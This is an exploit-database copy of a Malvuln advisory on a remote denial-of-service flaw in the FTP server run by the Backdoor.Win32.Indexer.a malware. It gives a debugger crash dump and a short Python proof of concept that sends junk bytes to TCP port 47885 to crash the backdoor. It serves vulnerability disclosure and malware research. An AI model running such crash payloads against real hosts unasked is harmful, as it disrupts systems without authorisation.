Advertisement






Backdoor.Win32.Indexer.a / Remote Dos

CVE Category Price Severity
N/A CWE-399 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2021-02-16
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 0.02192 0.50265

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020097

Below is a copy:

Backdoor.Win32.Indexer.a / Remote Dos
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/2b576e7551afe1c7575dc680396f1b5b_B.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Indexer.a
Vulnerability: Remote Denial Of Service
Description: Indexer.a runs an FTP server that listens on TCP port 47885, sending an unexpected payload of junk chars causes an exception resulting in a crash an denial of service.
Type: PE32
MD5: 2b576e7551afe1c7575dc680396f1b5b
Vuln ID: MVID-2021-0092
Dropped files: 
Disclosure: 02/16/2021 

Memory Dump:
(1618.14b0): Unknown exception - code 0eedfade (first/second chance not available)
eax=00000000 ebx=00000000 ecx=00000007 edx=00000000 esi=00000003 edi=00000003
eip=7710ed3c esp=0019f460 ebp=0019f5f0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400          ret     14h

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP: 
KERNELBASE!RaiseException+62
75eb08f2 8b4c2454        mov     ecx,dword ptr [esp+54h]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062)
   ExceptionCode: 0eedfade
  ExceptionFlags: 00000001
NumberParameters: 7
   Parameter[0]: 004129ae
   Parameter[1]: 04105d4c
   Parameter[2]: 04105dc8
   Parameter[3]: 00000000
   Parameter[4]: 00000000
   Parameter[5]: 0019fe9c
   Parameter[6]: 0019fddc

DEFAULT_BUCKET_ID:  DELPHI_EXCEPTION

PROCESS_NAME:  Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

ERROR_CODE: (NTSTATUS) 0xeedfade - <Unable to get error code text>

EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - <Unable to get error code text>

EXCEPTION_PARAMETER1:  004129ae

EXCEPTION_PARAMETER2:  04105d4c

EXCEPTION_PARAMETER3:  04105dc8

EXCEPTION_PARAMETER4: 0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  000014b0

PRIMARY_PROBLEM_CLASS:  DELPHI_EXCEPTION

BUGCHECK_STR:  APPLICATION_FAULT_DELPHI_EXCEPTION

LAST_CONTROL_TRANSFER:  from 00443345 to 75eb08f2

STACK_TEXT:  
0019fdf0 00443345 041050ac 041050ac 0044317f KERNELBASE!RaiseException+0x62
WARNING: Stack unwind information not available. Following frames may be wrong.
0019fe14 0040c70b 0040ba01 04102c70 00443345 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe20 00443345 04102c70 04102c70 0044317f Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!FtpsrvTFtpServer$bdtr$qqrv+0x47
0019fe2c 0044317f 00000000 0019fe9c 00000000 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe44 004311ea 04102200 00000001 0044c7a9 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x2fe43
0019fe50 0044c7a9 0041c253 04102c70 04102c70 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x1deae
0019fe54 0041c253 04102c70 04102c70 04102c70 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x3946d
0044c7a9 52ff108b 84c358e4 c3017fd2 108b5250 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x8f17
0044c7ad 84c358e4 c3017fd2 108b5250 5ae852ff 0x52ff108b
0044c7b1 c3017fd2 108b5250 5ae852ff 8090c358 0x84c358e4
0044c7b5 108b5250 5ae852ff 8090c358 45a9b03d 0xc3017fd2
0044c7b9 5ae852ff 8090c358 45a9b03d 10760100 0x108b5250
0044c7bd 8090c358 45a9b03d 10760100 006a006a 0x5ae852ff
0044c7c1 45a9b03d 10760100 006a006a df68006a 0x8090c358
0044c7c5 10760100 006a006a df68006a e80eedfa 0x45a9b03d
0044c7c9 006a006a df68006a e80eedfa 0000bb7f 0x10760100
0044c7cd df68006a e80eedfa 0000bb7f 809090c3 0x6a006a
0044c7d1 e80eedfa 0000bb7f 809090c3 45a9b03d 0xdf68006a
0044c7d5 00000000 809090c3 45a9b03d 16740000 0xe80eedfa


FOLLOWUP_IP: 
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+30009
00443345 8b7310          mov     esi,dword ptr [ebx+10h]

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b

IMAGE_NAME:  Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  3814be7c

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb

BUCKET_ID:  APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FAILURE_BUCKET_ID:  DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe!Ftpsrvcinitialization$qqrv


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=47885

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PBARBAR="A"*256
    s.send(PBARBAR)
    
    print("Backdoor.Win32.Indexer.a / Remote Dos")
    print("MD5: 2b576e7551afe1c7575dc680396f1b5b")
    print("By Malvuln");

if __name__=="__main__":
    doit()



Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum